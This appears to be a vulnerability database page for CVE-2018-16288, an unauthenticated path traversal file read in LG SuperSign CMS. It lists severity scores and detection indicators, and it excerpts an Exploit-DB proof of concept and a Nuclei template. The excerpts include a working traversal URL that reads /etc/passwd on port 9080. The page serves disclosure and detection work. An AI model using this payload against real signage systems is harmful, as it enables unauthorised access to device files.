CVE-2018-16288
published 2018-09-14CVE-2018-16288: LG SuperSign CMS allows reading of arbitrary files via signEzUI/playlist/edit/upload/..%2f URIs.
PriorityP269high8.6CVSS 3.0
AVNACLPRNUINSCCHINAN
EXPLOIT
EPSS
35.26%
98.2th percentile
LG SuperSign CMS allows reading of arbitrary files via signEzUI/playlist/edit/upload/..%2f URIs.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| lg | supersign_cms | — | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Detect unauthenticated HTTP GET requests to the vulnerable LFI path on port 9080 containing path traversal sequences (%2f..%2f) targeting /signEzUI/playlist/edit/upload/ ↗
- →No authentication is required to exploit this LFI; alert on any request to the vulnerable path regardless of session/auth headers ↗
- →A successful exploitation response will contain Unix passwd file content matching root:.*:0:0: with HTTP 200 status ↗
- ·The exploit was tested specifically against Web OS 4.0; behavior on other versions may differ ↗
- ·The vulnerable service listens on port 9080; ensure network monitoring covers this non-standard HTTP port ↗
CVSS provenance
nvdv3.08.6HIGHCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
nvdv2.07.8HIGHAV:N/AC:L/Au:N/C:C/I:N/A:N
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
LG SuperSign EZ CMS 2.5 - Local File Inclusion
exploitdb·2018-09-19·CVSS 8.6
CVE-2018-16288 [HIGH] LG SuperSign EZ CMS 2.5 - Local File Inclusion
LG SuperSign EZ CMS 2.5 - Local File Inclusion
---
# Exploit Title: LG SuperSign EZ CMS 2.5 - Local File Inclusion
# Date: 2018-09-13
# Exploit Author: Alejandro Fanjul
# Vendor Homepage: https://www.lg.com/ar/software-lg-supersign
# Version: SuperSign EZ (CMS)
# Tested on: Web OS 4.0
# CVE : CVE-2018-16288
# More info: http://mamaquieroserpentester.blogspot.com/2018/09/multiple-vulnerabilities-in-lg.html
# Any user can read files from the TV, without authentication due to an existing LFI in the following path:
# http://SuperSign_IP:9080/signEzUI/playlist/edit/upload/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd
# PoC
import requests
import re
from argparse import ArgumentParser
parser = ArgumentParser(description="SuperSign Reboot")
parser.add_argument("-t", "--target"
Nuclei
LG SuperSign EZ CMS 2.5 - Local File Inclusion
nuclei·CVSS 8.6
CVE-2018-16288 [HIGH] LG SuperSign EZ CMS 2.5 - Local File Inclusion
LG SuperSign EZ CMS 2.5 - Local File Inclusion
LG SuperSign CMS 2.5 allows reading of arbitrary files via signEzUI/playlist/edit/upload/..%2f URIs - aka local file inclusion.
Template:
id: CVE-2018-16288
info:
name: LG SuperSign EZ CMS 2.5 - Local File Inclusion
author: daffainfo
severity: high
description: |
LG SuperSign CMS 2.5 allows reading of arbitrary files via signEzUI/playlist/edit/upload/..%2f URIs - aka local file inclusion.
impact: |
An attacker can exploit this vulnerability to read sensitive files, execute arbitrary code, or launch further attacks.
remediation: |
Apply the latest security patches or upgrade to a patched version of LG SuperSign EZ CMS.
reference:
- https://www.exploit-db.com/exploits/45440
- http://mamaquieroserpentester.blogspot.com/2018/09/multiple-vulner
2018-09-14
Published